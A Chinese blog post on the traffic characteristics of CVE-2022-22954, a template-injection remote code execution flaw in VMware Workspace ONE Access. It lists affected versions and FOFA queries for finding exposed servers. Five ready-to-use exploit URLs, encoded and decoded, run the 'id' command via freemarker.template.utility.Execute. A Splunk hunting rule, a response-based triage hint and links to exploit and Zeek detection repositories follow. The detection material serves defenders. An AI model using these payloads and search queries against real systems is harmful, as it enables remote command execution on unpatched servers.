CVE-2022-22954-VMware Workspace ONE Access SSTI远程代码执行流量特征

简介

仅用于技术交流和学习研究使用，请勿用于非法攻击，否则造成一切后果与本人无关

VMware Workspace ONE Access and Identity Manager包含一个由于服务器端模板注入而导致的远程代码执行漏洞。VMware已将此问题的严重性评估为处于严重严重性范围内，CVSSv3基本得分最高为9.8。

具有网络访问权限的恶意行为者可以触发可能导致远程代码执行的服务器端模板注入。

影响范围

VMware Workspace ONE Access Appliance （版本号：20.10.0.0 ，20.10.0.1 ，21.08.0.0 ，21.08.0.1 ）
VMware Identity Manager Appliance （版本号：3.3.3 ， 3.3.4 ， 3.3.5 ，3.3.6）
VMware Realize Automation （版本号：7.6）
1
2
3

EXP/POC

请勿用做非法用途，仅用于检测测试。

fofa语法：

icon_hash="-1250474341"
app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager"
1
2

/catalog-portal/ui?code=&deviceUdid=&deviceType=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/hub-ui?deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/hub-ui/byob?deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/ui/oauth/verify?error=&deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/ui/oauth/verify?code=&deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
1
2
3
4
5

URL decode

/catalog-portal/ui?code=&deviceUdid=&deviceType=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/hub-ui?deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/hub-ui/byob?deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/ui/oauth/verify?error=&deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/ui/oauth/verify?code=&deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
1
2
3
4
5

检测规则/思路

Splunk公开规则

| tstats count from datamodel=Web where Web.http_method IN ("GET")
  Web.url="*deviceudid=*" AND Web.url IN ("*java.lang.ProcessBuilder*","*freemarker.template.utility.ObjectConstructor*")
  by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest sourcetype
  | `drop_dm_object_name("Web")` 
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)` 
  | `vmware_server_side_template_injection_hunt_filter
1
2
3
4
5
6
7

结合状态码及返回内容包进行分析研判。以下可作为参考：

返回状态为200，且包涵Authorization context is not valid
1

参考推荐

vmware_server_side_template_injection_hunt

https://github.com/splunk/security_content/blob/develop/detections/web/vmware_server_side_template_injection_hunt.yml

利用脚本

https://github.com/bewhale/CVE-2022-22954

CVE-2022-22954 VMware Workspace ONE Access SSTI RCE

https://xz.aliyun.com/t/11196

zeek-CVE-2022-22954

https://github.com/corelight/cve-2022-22954

相关阅读:
第十三章第三节：Java数据结构预备知识之泛型
JavaWeb | HTTP 协议请求与响应格式
测试平台前端部署
线程是什么？线程的相关概念以及基本的使用方法说明【内附可执行源码注释完整】
2024年计算机、信息工程与大数据应用国际会议（CIEBDA 2024）
(一)探索随机变量及其分布：概率世界的魔法
【无标题】
qt_vs_tools 设置
Netty 学习（二）：服务端与客户端通信
大模型LLM 在线量化；GPTQ\AWQ量化及推理

原文地址：https://blog.csdn.net/qq_36334464/article/details/125457423